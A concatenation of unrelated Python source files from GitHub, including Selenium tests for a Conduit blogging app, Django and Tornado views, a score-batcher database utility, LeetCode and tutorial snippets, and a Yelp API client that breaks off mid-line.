self.browser.find_element_by_xpath('//input[@placeholder=\"Article Title\"]')\n about = self.browser.find_element_by_xpath('//input[@placeholder=\"What\\'s this article about?\"]')\n body = self.browser.find_element_by_xpath('//textarea[@placeholder=\"Write your article (in markdown)\"]')\n tags = self.browser.find_element_by_xpath('//input[@class=\"ti-new-tag-input ti-valid\"]')\n submit_btn = self.browser.find_element_by_xpath('//button[@type=\"submit\"]')\n # open file\n with open('article_data.txt', 'r', encoding='UTF-8') as article:\n # read line-by-line\n file_content = article.readlines()\n # send keys with specific lines\n title.send_keys(file_content[1].rstrip())\n about.send_keys(file_content[3].rstrip())\n body.send_keys(file_content[5].rstrip())\n tags.send_keys(file_content[7])\n tags.send_keys(file_content[8])\n # submit data\n submit_btn.click()\n time.sleep(1)\n # find elements after write\n article_title = self.browser.find_element_by_css_selector('h1')\n article_author = self.browser.find_element_by_xpath('//a[@class=\"author\"]')\n article_body_text = self.browser.find_element_by_xpath('//div[@class=\"row article-content\"]/div/div[1]/p')\n # asserts: article parts equal to the lines\n assert article_title.text == file_content[1].rstrip()\n assert article_author.text == registered['username']\n assert article_body_text.text == file_content[5].rstrip()\n # empty tag list\n tag_list = []\n tags = self.browser.find_elements_by_xpath('//a[@class=\"tag-pill tag-default\"]')\n # collect tags into a list\n for tag in tags:\n tag_list.append(tag.text)\n # assert tags from article_data were successfully appeared on page\n assert file_content[7].rstrip() and file_content[8].rstrip() in tag_list\n\n # end of test write new article\n\n # test edit/modify article\n def test_modify_article(self):\n # run login function\n login(self)\n # navigate to my own profile\n self.browser.get(registered['user_profile_link'])\n time.sleep(1)\n # find the article we want to modify\n # article_title = WebDriverWait(self.browser, 2).until(\n # EC.presence_of_element_located((By.XPATH, 'h1[text()=\"Just another clickbait article\"]')))\n article_title = self.browser.find_element_by_xpath('//h1[text()=\"Just another clickbait article\"]')\n # click on article\n article_title.click()\n time.sleep(1)\n edit_btn = self.browser.find_element_by_xpath('//a[@href=\"#/editor/just-another-clickbait-article\"]')\n edit_btn.click()\n time.sleep(1)\n body_input = self.browser.find_element_by_xpath(\n '//textarea[@placeholder=\"Write your article (in markdown)\"]')\n body_input.clear()\n new_article_body = 'I just modified this article. It\\'s not about clickbait anymore.'\n body_input.send_keys(new_article_body)\n tags_input = self.browser.find_element_by_xpath('//input[@class=\"ti-new-tag-input ti-valid\"]')\n tags_input.send_keys(Keys.BACKSPACE)\n tags_input.send_keys(Keys.BACKSPACE)\n editor_tags = []\n tags_in_editor = self.browser.find_elements_by_xpath('//li[@class=\"ti-tag ti-valid\"]')\n for tag in tags_in_editor:\n editor_tags.append(tag.text)\n submit_btn = self.browser.find_element_by_xpath('//button[@type=\"submit\"]')\n submit_btn.click()\n time.sleep(1)\n tag_list = []\n tags = self.browser.find_elements_by_xpath('//a[@class=\"tag-pill tag-default\"]')\n # collect tags into a list\n for tag in tags:\n tag_list.append(tag.text)\n article_body_text = self.browser.find_element_by_xpath('//div[@class=\"row article-content\"]/div/div[1]/p')\n assert article_body_text.text == new_article_body\n assert editor_tags == tag_list\n\n # end of test edit/modify article\n\n # test delete article\n def test_delete_article(self):\n # run login function\n login(self)\n # navigate to my own profile\n self.browser.get(registered['user_profile_link'])\n # find the article we want to delete\n # article_title = WebDriverWait(self.browser, 3).until(\n # EC.presence_of_element_located((By.XPATH, 'h1[text()=\"Just another clickbait article\"]')))\n article_title = self.browser.find_element_by_xpath('h1[text()=\"Just another clickbait article\"]')\n time.sleep(2)\n # click on article\n article_title.click()\n time.sleep(1)\n # assert delete button displayed\n delete_btn = self.browser.find_element_by_xpath('//button[@class=\"btn btn-outline-danger btn-sm\"]')\n assert delete_btn.is_displayed()\n delete_btn.click()\n # time.sleep(1)\n # delete_msg = self.browser.find_element_by_xpath('//div[text()=\"Deleted the article. Going home...\"]')\n # assert delete_msg.is_displayed()\n assert self.browser.current_url == 'http://localhost:1667/#/'\n\n # end of test delete article\n\n # test collect data from a user's profile\n def test_collect_data(self):\n # run login function\n login(self)\n # navigate to the specific user's profile\n user_profile_link = 'http://localhost:1667/#/@thetester/'\n self.browser.get(user_profile_link)\n time.sleep(1)\n # find elements\n profile_pic_link = self.browser.find_element_by_xpath('//img[@class=\"user-img\"]').get_attribute('src')\n user_name = self.browser.find_element_by_xpath('//div[@class=\"profile-page\"]/div[1]/div/div/div/h4')\n user_bio = self.browser.find_element_by_xpath('//div[@class=\"profile-page\"]/div[1]/div/div/div/p')\n user_article_titles = self.browser.find_elements_by_xpath('//h1')\n # open or create a file, collect data and fill the file with them\n with open('collected_data.txt', 'a', encoding='UTF-8') as data_collection:\n # username\n data_collection.write('Current user\\'s name: \\n' + user_name.text + '\\n')\n # picture link\n data_collection.write('Profile picture link: \\n' + profile_pic_link + '\\n')\n # bio\n data_collection.write('About: \\n' + user_bio.text + '\\n')\n # articles\n data_collection.write('Articles ' + user_name.text + ' wrote:\\n')\n # use for loop to get the article titles\n for title in user_article_titles:\n data_collection.write('- ' + title.text + '\\n')\n # open (read only) the created file\n with open('collected_data.txt', 'r', encoding='UTF-8') as data_collection:\n # read line-by-line\n collection_content = data_collection.readlines()\n # assert article parts equal to the lines\n assert user_name.text == collection_content[1].rstrip()\n assert profile_pic_link == collection_content[3].rstrip()\n assert user_bio.text == collection_content[5].rstrip()\n assert '- ' + user_article_titles[0].text == collection_content[7].rstrip()\n\n # end of test collect data from a user's profile\n\n # create a list out of titles from the main page\n def test_new_list(self):\n # run login function\n login(self)\n # empty list for the article titles\n article_title_list = []\n # find elements\n main_article_title = self.browser.find_elements_by_xpath('//h1')\n conduit_main_text = self.browser.find_element_by_xpath('//h1[@class=\"logo-font\"]')\n # get every title with for loop\n for title in main_article_title:\n # exception: conduit logo is not a title\n if title.text != conduit_main_text.text:\n article_title_list.append(title.text)\n print(article_title_list)\n # assert both list contains the same number of elements (-1 because of 'conduit')\n assert len(main_article_title) - 1 == len(article_title_list)\n\n # end of create list\n\n # test paginator (go to next page)\n def test_next_page(self):\n # run login function\n login(self)\n # find elements\n first_page = self.browser.find_element_by_xpath('//li[@data-test=\"page-link-1\"]')\n second_page = self.browser.find_element_by_xpath('//li[@data-test=\"page-link-2\"]')\n second_page_link = self.browser.find_element_by_xpath('//li[@data-test=\"page-link-2\"]/a')\n # second_page_color = second_page_link.get_attribute(\"background-color\") # nem működik\n # print(second_page_color)\n # scroll at the bottom of the page\n page_html = self.browser.find_element_by_xpath('//html')\n page_html.send_keys(Keys.END)\n # assert #1 page is the active page\n assert first_page.get_attribute('class') == 'page-item active'\n time.sleep(1)\n # click on page #2\n second_page_link.click()\n # assert #2 page is the active page, and get the right background color\n second_page_get_color = second_page_link.value_of_css_property('background-color')\n second_page_hex_color = Color.from_string(second_page_get_color).hex\n assert second_page.get_attribute('class') == 'page-item active'\n assert second_page_hex_color == '#5cb85c'\n\n # end of test paginator\n\n # test write comment function\n def test_write_comment(self):\n # run login function\n login(self)\n # find the first article from main page\n first_article = self.browser.find_element_by_xpath('//div[@class=\"article-preview\"][1]')\n # click on article\n first_article.click()\n time.sleep(1)\n # assert comment form is displayed\n comment_form = self.browser.find_element_by_xpath('//form[@class=\"card comment-form\"]')\n assert comment_form.is_displayed()\n # assert we can write a comment\n comment_textarea = self.browser.find_element_by_xpath('//textarea[@placeholder=\"Write a comment...\"]')\n assert comment_textarea.is_enabled()\n # writing comment\n comment_textarea.send_keys('This is a simple comment.')\n # post button\n send_btn = self.browser.find_element_by_xpath(\n '//button[@class=\"btn btn-sm btn-primary\"][text()=\"Post Comment\"]')\n # click post button\n send_btn.click()\n time.sleep(1)\n # find the fresh comment\n comment_sent = self.browser.find_element_by_xpath('//p[text()=\"This is a simple comment.\"]')\n # find the author of the fresh comment\n comment_author = self.browser.find_element_by_xpath('//a[@class=\"comment-author\"][2]')\n # assert the fresh comment is appeared\n assert comment_sent.is_displayed()\n # assert we wrote the fresh comment\n assert registered['username'] in comment_author.text\n\n # end of test write comment function\n\n # test logout function\n def test_logout(self):\n # find navbar\n navbar = self.browser.find_element_by_xpath('//nav')\n # assert there is no logout button (text) on navbar\n assert 'Log out' not in navbar.text\n # run login function\n login(self)\n # assert Logout button displayed\n assert 'Log out' in navbar.text\n # find logout button\n log_out_link = self.browser.find_element_by_xpath('//a[contains(text(), \"Log out\")]')\n # click on logout button\n log_out_link.click()\n # assert there is no logout button (text) on navbar after logout\n assert 'Log out' not in navbar.text\n # end of test logout function\n","repo_name":"Dinaa95/conduittest2","sub_path":"test/test_conduit.py","file_name":"test_conduit.py","file_ext":"py","file_size_in_byte":16706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74484985127","text":"from django.shortcuts import render\nfrom play.models import UsersInfo\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n@login_required(login_url='login')\ndef profile(r):\n uinfo = UsersInfo.objects.get(userName=r.user)\n context = {\n 'userName': uinfo.userName,\n 'email': uinfo.email,\n 'level': uinfo.level,\n 'score': uinfo.score\n }\n return render(r, 'profile.html', context)\n","repo_name":"vamsikrishna7-github/gameon","sub_path":"gameon/Profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27199495122","text":"from item.util import convert_units\n\n#: Input arguments\nARGS = [\"T003\", \"T009\"]\n\n\ndef compute(activity, stock):\n \"\"\"Quality diagnostic for freight load factor.\n\n Returns the ratio of road freight traffic from :mod:`.T003` and the total number\n of freight vehicles from :mod:`.T009`.\n\n Parameters\n ----------\n activity : pandas.DataFrame\n From :mod:`.T003`.\n stock : pandas.DataFrame\n From :mod:`.T009`.\n \"\"\"\n spacetime = [\"REF_AREA\", \"TIME_PERIOD\"]\n\n # Select activity\n activity = activity.query(\"MODE == 'Road' and VEHICLE == '_T'\").set_index(spacetime)\n\n # Select stock\n mask = stock.FUEL.isin([\"_Z\"]) & stock.VEHICLE.isin(\n [\n \"Light goods road vehicles\",\n \"Lorries (vehicle wt over 3500 kg)\",\n \"Road tractors\",\n ]\n )\n stock = stock[mask].groupby(spacetime).sum(numeric_only=True)\n\n return (\n # Compute ratio, drop nulls\n (activity[\"VALUE\"] / stock[\"VALUE\"])\n .dropna()\n # Restore column names, for convert_units()\n .rename(\"VALUE\")\n .reset_index()\n .assign(VARIABLE=\"Load factor\", SERVICE=\"F\", MODE=\"Road\")\n # To preferred units\n .pipe(convert_units, \"Gt km / year / kvehicle\", \"kt km / year / vehicle\")\n )\n","repo_name":"transportenergy/database","sub_path":"item/historical/diagnostic/A003.py","file_name":"A003.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"36520407096","text":"#python object oriented programming.\n\n#1 - Creating and instantiating a Python class\n\n# Allow us to logically group our data and function in a way that's easy to reuse as well as build upon.\n# Method --> A function associated with a class\n\n# Attribute --> A variable associated with a class\n\n# classes are blueprints for creating instances.\n\n# Each unique employee is an instance of the Employee_oop class.\nclass Employee_oop:\n def __init__(self, first, last, pay): #self --> variable name for created instance.\n self.first = first\n self.last = last\n self.pay = pay\n self.email = '{}.{}@company.com'.format(first, last)\n \n def fullname(self, middle=None): #When calling methods use paranthesis at end to print it out.\n if middle == None:\n return('{} {}'.format(self.first, self.last))\n else:\n return('{} {} {}'.format(self.first, middle, self.last))\n\n\n\nemp_1 = Employee_oop('Corey', 'Schafer', 50000)\nemp_2 = Employee_oop('John', 'Doe', 60000)\n\nprint(emp_1.fullname()) \nprint(emp_2.fullname('Jane'))\n\n\n","repo_name":"ameerhkhan/Python-Practice-Exercises","sub_path":"OOP_Concepts/OOP_ex1.py","file_name":"OOP_ex1.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32124099677","text":"from astropy.table import Table, Column, MaskedColumn\nimport numpy as np\n\n# MaskedColumn object\n# a = MaskedColumn([1, 2], name='a', mask=[False, True], dtype='i4')\n# b = Column([3, 4], name='b', dtype='i8')\n# print(Table([a, b]))\n\n# numpy maskedarray; remember, the arrays are COLUMNS of data\na = np.ma.array([1, 2])\nb = [3, 4]\nt = Table([a, b], names=('a', 'b'), masked=True)\nprint(f\"\\nthe numpy maskedarray \\n{t}\\n\")\n\n# t = Table([(1, 2), (3, 4)], names=('a', 'b'), masked=True)\nt['a'].mask = [False, True] # Modify column mask (boolean array)\nt['b'].mask = [True, False] # Modify column mask (boolean array)\nprint(t)\nt['a'].fill_value = 0\nt['b'].fill_value = 0\nprint(f\"\\nthe numpy maskedarray \\n{t.filled()}\\n\")\n\n# directly using np.ma.masked elements; embedded is slower\n# a = [1.0, np.ma.masked]\n# b = [np.ma.masked, 'val']\n# print(Table([a, b], names=('a', 'b')))\n","repo_name":"AndrewJAHogue/Sofia-Spitzer-telescope-internship","sub_path":"Pixel Intensity Plots/scratchwork/masked_data.py","file_name":"masked_data.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20366580429","text":"\"\"\"\r\nFunciones generadoras y expr. generadoras\r\n\"\"\"\r\n\r\ndef mul3Lista(ini, fin, salto=1):\r\n L = []\r\n \r\n for i in range(ini, fin, salto):\r\n if i % 3 == 0:\r\n print('lista mul3:', i)\r\n L.append(i)\r\n return L\r\n\r\ndef mul3gen(ini, fin, salto=1):\r\n for i in range(ini, fin, salto):\r\n if i % 3 == 0:\r\n print('gen mul3:', i)\r\n yield i\r\n\r\nprint('lista:')\r\nfor i in mul3Lista(1,20):\r\n print(i)\r\n\r\nprint('generador:')\r\nfor i in mul3gen(1,20):\r\n print(i)\r\n\r\n\r\n","repo_name":"aldebarran22/curso_santander_1","sub_path":"codigo_junio/generadores.py","file_name":"generadores.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33518862053","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\nimport json\nfrom sqlalchemy.sql import union\nfrom sqlalchemy.sql.expression import Select\nfrom sqlalchemy.exc import IntegrityError\nfrom smarter_score_batcher.database.tsb_connector import TSBDBConnection\nfrom smarter_score_batcher.constant import Constants\nfrom smarter_score_batcher.error.constants import ErrorsConstants\nfrom smarter_score_batcher.error.error_file_generator import build_error_info_header, \\\n build_err_list_from_object\nimport time\n\n\ndef save_assessment(conn, data):\n '''\n Save an assessment to `Constants.TSB_ASMT` table.\n '''\n parameters = {key: value for key, value in zip(data.header, data.values)}\n ins = conn.get_table(Constants.TSB_ASMT).insert()\n conn.execute(ins, **parameters)\n\n\ndef save_metadata(conn, asmtGuid, stateCode, metadata):\n '''\n Save metadata to `Constants.TSB_METADATA` table.\n '''\n parameters = {\n Constants.ASMT_GUID: asmtGuid,\n Constants.STATE_CODE: stateCode,\n Constants.CONTENT: json.dumps(metadata)\n }\n ins = conn.get_table(Constants.TSB_METADATA).insert()\n conn.execute(ins, **parameters)\n\n\ndef save_error_msg(asmtGuid, stateCode, err_code=None, err_source=None,\n err_code_text=None, err_source_text=None, err_input=None):\n '''\n Save error message to `Constants.TSB_ERROR` table.\n '''\n parameters = {\n Constants.ASMT_GUID: asmtGuid,\n Constants.STATE_CODE: stateCode,\n ErrorsConstants.ERR_CODE: err_code,\n ErrorsConstants.ERR_SOURCE: err_source,\n ErrorsConstants.ERR_CODE_TEXT: err_code_text,\n ErrorsConstants.ERR_SOURCE_TEXT: err_source_text,\n ErrorsConstants.ERR_INPUT: err_input\n }\n with TSBDBConnection() as conn:\n ins = conn.get_table(Constants.TSB_ERROR).insert()\n conn.execute(ins, **parameters)\n\n\ndef get_metadata(conn, asmtGuid):\n '''\n Get assessment metadata by assessment guid. The assessment guid is passed in from XML request.\n '''\n tsb_metadata = conn.get_table(Constants.TSB_METADATA)\n query = Select([tsb_metadata]).where(tsb_metadata.c.asmt_guid == asmtGuid).with_for_update()\n return conn.get_result(query)\n\n\ndef get_all_assessment_guids():\n '''\n Get all unique assessment guids from `Constants.TSB_METADATA` and `Constants.TSB_ERROR` tables.\n\n If a TSB request being processed successfully, a metadata record will be saved to `Constants.TSB_METADATA`,\n while an error record will be saved to `Constants.TSB_ERROR` in case of a request failed. This is the\n reason that this function need to look into both tables.\n '''\n with TSBDBConnection() as conn:\n # query guids from metadata table\n tsb_metadata = conn.get_table(Constants.TSB_METADATA)\n query_metadata = Select([tsb_metadata.c.state_code, tsb_metadata.c.asmt_guid])\n # query guids from error message table\n tsb_error = conn.get_table(Constants.TSB_ERROR)\n query_error = Select([tsb_error.c.state_code, tsb_error.c.asmt_guid])\n return conn.execute(union(query_metadata, query_error)).fetchall()\n\n\ndef get_assessments(asmtGuid):\n '''Query an assessment batch by assessment guid. Assessments in the\n batch are organized as a list with each assessment row as an item.\n\n :param: assessment guid\n :return: list of all assessment guids\n :return: list of all assessment data\n :return: list of column names in the same order as assessment data\n '''\n with TSBDBConnection() as conn:\n tsb_asmt = conn.get_table(Constants.TSB_ASMT)\n columns = []\n data = []\n guids = []\n query = Select([tsb_asmt]).where(tsb_asmt.c.AssessmentGuid == asmtGuid)\n assessments = conn.get_streaming_result(query)\n for i, asmt in enumerate(assessments):\n row = []\n for j, (column, value) in enumerate(asmt.items()):\n if i == 0 and j > 0: # first column is guid\n columns.append(column)\n if j == 0:\n guids.append(value)\n else:\n row.append(value)\n data.append(row)\n return guids, data, columns\n\n\ndef get_error_message(asmtGuid):\n '''\n Get all error message within a batch by assessment guid.\n\n :param: assessment guid\n :return: list of error record guids\n :return: list of errors\n '''\n with TSBDBConnection() as conn:\n tsb_error = conn.get_table(Constants.TSB_ERROR)\n error_info = build_error_info_header()\n query = Select([tsb_error]).where(tsb_error.c.asmt_guid == asmtGuid)\n errors = conn.get_streaming_result(query)\n error_guids = []\n for error in errors:\n error_guids.append(error[Constants.TSB_ERROR_GUID])\n err_list = build_err_list_from_object(error)\n error_info[ErrorsConstants.TSB_ERROR].append(err_list)\n return error_guids, error_info\n\n\ndef delete_assessments(assessment_id, tsb_asmt_rec_ids, tsb_error_rec_ids):\n '''\n Delete assessment information in database with a batch.\n\n :param: assessment guid\n :param: list of `Constants.TSB_ASMT` primary keys\n :param: list of `Constants.TSB_ERROR` primary keys\n '''\n retry = 3\n while retry != 0:\n with TSBDBConnection() as conn:\n transaction = conn.get_transaction()\n try:\n # delete error messages\n if tsb_error_rec_ids:\n tsb_error = conn.get_table(Constants.TSB_ERROR)\n conn.execute(tsb_error.delete().where(tsb_error.c.tsb_error_rec_id.in_(tsb_error_rec_ids)))\n\n # delete meta data in database\n if tsb_asmt_rec_ids:\n tsb_asmt = conn.get_table(Constants.TSB_ASMT)\n conn.execute(tsb_asmt.delete().where(tsb_asmt.c.tsb_asmt_rec_id.in_(tsb_asmt_rec_ids)))\n\n # delete assessment data in database\n if assessment_id:\n tsb_metadata = conn.get_table(Constants.TSB_METADATA)\n conn.execute(tsb_metadata.delete().where(tsb_metadata.c.asmt_guid == assessment_id))\n transaction.commit()\n break\n except:\n transaction.rollback()\n time.sleep(1)\n retry -= 1\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter_score_batcher/smarter_score_batcher/database/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":6930,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"16463266693","text":"from base.testing import KlaytnBaseTesting\n\n\nclass TestForkStatus(KlaytnBaseTesting):\n\n def setUp(self) -> None:\n super().setUp()\n self.forkNumber = 20\n\n def test_post(self):\n self.response = self.w3.klay.fork_status(\n self.forkNumber\n )\n self.assertTrue(self.response >= 0)\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/sdk/client/python/openapi-test/test/klay/configuration/test_fork_status.py","file_name":"test_fork_status.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"18824260922","text":"from flasgger import Swagger\n\nswagger_config = {\n \"headers\": [\n ],\n \"specs\": [\n {\n \"endpoint\": 'bot',\n \"route\": '/bot.json',\n \"rule_filter\": lambda rule: True, \n \"model_filter\": lambda tag: True, \n }\n ],\n \"static_url_path\": \"/flasgger_static\",\n \"swagger_ui\": True,\n \"specs_route\": \"/apidocs/\"\n }\n\ndef config_swagger(app):\n \n swagger = Swagger(app,\n template={\n \"info\": {\n \"title\": \"backend api\",\n \"version\": \"1.0\",\n },\n\n },config=swagger_config\n )\n\n return swagger","repo_name":"sinaban/bot-backend","sub_path":"swagger_config.py","file_name":"swagger_config.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38132577789","text":"import bisect\nimport math\nfrom typing import List\nfrom collections import deque, defaultdict, OrderedDict, Counter\nfrom util import (\n TreeNode, lc_list2tree,\n ListNode, lc_list2singlelinkedlist\n)\n\n\nclass Solution:\n def spiralMatrixIII(self, rows: int, cols: int, rStart: int, cStart: int) -> List[List[int]]:\n d = [[0, 1], [1, 0], [0, -1], [-1, 0]]\n idx = 0\n flag = True\n cnt = 1\n ans = [[rStart, cStart]]\n last = [rStart, cStart]\n while len(ans) < rows * cols:\n for i in range(cnt):\n new_row = last[0] + d[idx % 4][0]\n new_col = last[1] + d[idx % 4][1]\n if 0 <= new_row < rows and 0 <= new_col < cols:\n ans.append([new_row, new_col])\n last = [new_row, new_col]\n if flag:\n flag = False\n else:\n flag = True\n cnt += 1\n idx += 1\n return ans\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n rows = 5\n cols = 6\n rStart = 1\n cStart = 4\n rows = 1\n cols = 4\n rStart = 0\n cStart = 0\n print(sol.spiralMatrixIII(rows, cols, rStart, cStart))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc500+/lc885/SpiralMatrixIII.py","file_name":"SpiralMatrixIII.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32345946733","text":"import math\n\nn = int(input())\n\nnumber = str(math.factorial(n))\ncount = 0\n\nfor i in range(len(number) - 1, -1, -1):\n if number[i] == \"0\":\n count += 1\n else:\n break\n\nprint(count)\n","repo_name":"wisehero/thisiscodingtest","sub_path":"python/backjoon/class3/1676.py","file_name":"1676.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39669242974","text":"from django.shortcuts import render, redirect,reverse\nfrom myapp import models\nfrom myapp.views.users import checkUser\n\n\n#用户增加收货地址\n@checkUser\ndef addAddr(request):\n if request.method == 'POST':\n userid = request.session.get('user_id')\n addrname = request.POST.get('addr_name') # 收货人姓名\n addrtel = request.POST.get('addr_tel') # 收货人的电话\n addraddr = request.POST.get('addr_addr') # 收货人的地址\n if addrname and addrtel and addraddr:\n models.Addr.objects.create(user_id=userid,addr_name=addrname,addr_tel=addrtel,addr_addr=addraddr)\n return redirect('/selectAddr')\n\n\n#用户删除收货地址\n@checkUser\ndef delAdddr(request):\n addrid = request.GET.get('addrid')\n models.Addr.objects.filter(addr_id=addrid).delete()\n return redirect('/selectAddr')\n\n\n#用户查询收货地址\n@checkUser\ndef selectAddr(request):\n userid = request.session.get('user_id')\n data = models.Addr.objects.filter(user_id=userid)\n if data:\n return render(request,'selectAddr.html',{'data':data,'login_user':request.session.get('login_user')})\n else:\n message = '还没有收货地址哦!'\n return render(request,'selectAddr.html',{'message':message,'login_user':request.session.get('login_user')})\n\n\n#用户修改收货地址\n@checkUser\ndef updateAddr(request):\n addrid = request.POST.get('addrid')\n addrname = request.POST.get('addrname') # 收货人姓名\n addrtel = request.POST.get('addrtel') # 收货人的电话\n addraddr = request.POST.get('addr') # 收货人的地址\n models.Addr.objects.filter(addr_id=addrid).update(addr_name=addrname,addr_tel=addrtel,addr_addr=addraddr)\n return redirect('/selectAddr')","repo_name":"HouYingping/bookShop","sub_path":"myapp/views/addr.py","file_name":"addr.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71300791527","text":"# -*- coding: utf-8 -*-\n# @Date : 2016/5/22 16:57\n# @Author : 490949611@qq.com\n\nimport json\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom ..db.Member import Member\nfrom ..db.SelectMember import SelectMember\nimport traceback\n\nimport tornado.web\n\nclass ListHandler(tornado.web.RequestHandler):\n\t@property\n\tdef db(self):\n\t\treturn self.application.db\n\n\tdef on_finish(self):\n\t\tself.db.close()\n\n\tdef get_current_user(self):\n\t\treturn self.get_secure_cookie(\"user\")\n\n\tdef get(self):\n\t\tif not self.get_current_user():\n\t\t\tself.redirect(\"/login\")\n\t\t\treturn\n\t\telse:\n\t\t\tself.render('list.html')\n\n\n\n\n\n\n","repo_name":"cherishher/SelectClass","sub_path":"mod/list/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71826402729","text":"from datetime import datetime\nfrom typing import List, Optional\n\nimport requests\n\nfrom server.model.Business import Business\nfrom server.model.Category import Category\nfrom server.model.Location import Location\nfrom server.model.Review import Review\nfrom server.model.User import User\nfrom server.util.CustomLogger import CustomLogger\nfrom server.util.EnvironmentReader import EnvironmentReader\n\n\nclass YelpApiClient:\n \"\"\"\n https://www.yelp.com/developers/documentation/v3\n \"\"\"\n\n def __init__(self):\n self.__LOGGER = CustomLogger.getLogger()\n self.__BASE_URL = EnvironmentReader.get(\"YELP_API_BASE_URL\")\n self.__SEARCH_ROUTE = EnvironmentReader.get(\"YELP_API_SEARCH_ROUTE\")\n self.__REVIEWS_ROUTE = EnvironmentReader.get(\"YELP_API_REVIEWS_ROUTE\")\n self.__API_KEY = EnvironmentReader.get(\"YELP_API_API_KEY\")\n\n def __objectifyBusinessList(self, businessDictList: List[dict]) -> List[Business]:\n businessObjList = list()\n for businessDict in businessDictList:\n businessObjList.append(self.__objectifyBusiness(businessDict))\n return businessObjList\n\n def __objectifyBusiness(self, businessDict: dict) -> Optional[Business]:\n businessObj = None\n if businessDict is not None:\n businessObj = Business(id=businessDict[\"id\"],\n name=businessDict[\"name\"],\n imageUrl=businessDict[\"image_url\"],\n url=businessDict[\"url\"],\n reviewCount=businessDict[\"review_count\"],\n categories=self.__objectifyCategoriesList(businessDict[\"categories\"]),\n rating=businessDict[\"rating\"],\n location=self.__objectifyLocation(businessDict[\"location\"]),\n phone=businessDict[\"phone\"])\n return businessObj\n\n def __objectifyLocation(self, locationDict: dict) -> Optional[Location]:\n locationObj = None\n if locationDict is not None:\n locationObj = Location(address1=locationDict[\"address1\"],\n address2=locationDict[\"address2\"],\n address3=locationDict[\"address3\"],\n city=locationDict[\"city\"],\n zipCode=locationDict[\"zip_code\"],\n country=locationDict[\"country\"],\n state=locationDict[\"state\"],\n displayAddress=locationDict[\"display_address\"])\n return locationObj\n\n def __objectifyCategoriesList(self, categoriesDictList: List[dict]) -> List[Category]:\n categoriesList = list()\n for categoriesDict in categoriesDictList:\n categoriesList.append(Category(alias=categoriesDict[\"alias\"],\n title=categoriesDict[\"title\"]))\n return categoriesList\n\n def __objectifyUser(self, userDict: dict) -> Optional[User]:\n userObj = None\n if userDict is not None:\n userObj = User(id=userDict[\"id\"],\n profileUrl=userDict[\"profile_url\"],\n imageUrl=userDict[\"image_url\"],\n name=userDict[\"name\"])\n return userObj\n\n def __objectifyReview(self, reviewDict: dict) -> Optional[Review]:\n reviewObj = None\n if reviewDict is not None:\n reviewObj = Review(id=reviewDict[\"id\"],\n url=reviewDict[\"url\"],\n text=reviewDict[\"text\"],\n rating=reviewDict[\"rating\"],\n timeCreated=datetime.strptime(reviewDict[\"time_created\"], \"%Y-%m-%d %H:%M:%S\"),\n user=self.__objectifyUser(reviewDict[\"user\"]))\n return reviewObj\n\n def __objectifyReviewList(self, reviewDictList: List[dict]) -> List[Review]:\n reviewList = list()\n for reviewDict in reviewDictList:\n reviewList.append(self.__objectifyReview(reviewDict))\n return reviewList\n\n def getBusinessesBySearch(self, term: str, location: str, **kwargs) -> List[Business]:\n # https://www.yelp.com/developers/documentation/v3/business_search\n limit = kwargs.pop(\"limit\", 1)\n offset = kwargs.pop(\"offset\", 0)\n businesses = list()\n try:\n url = f\"{self.__BASE_URL}{self.__SEARCH_ROUTE}?term={term}&location={location}&limit={limit}&offset={offset}\"\n headers = {\n 'Authorization': 'Bearer %s' % self.__API_KEY,\n }\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n businesses = self.__objectifyBusinessList(response.json()[\"businesses\"])\n except Exception as e:\n self.__LOGGER.error(e)\n return businesses\n\n def getReviewsByBusinessId(self, businessId: str) -> List[Review]:\n # https://www.yelp.com/developers/documentation/v3/business_reviews\n reviews = list()\n try:\n url = f\"{self.__BASE_URL}/{businessId}{self.__REVIEWS_ROUTE}\"\n headers = {\n 'Authorization': 'Bearer %s' % self.__API_KEY,\n }\n response = 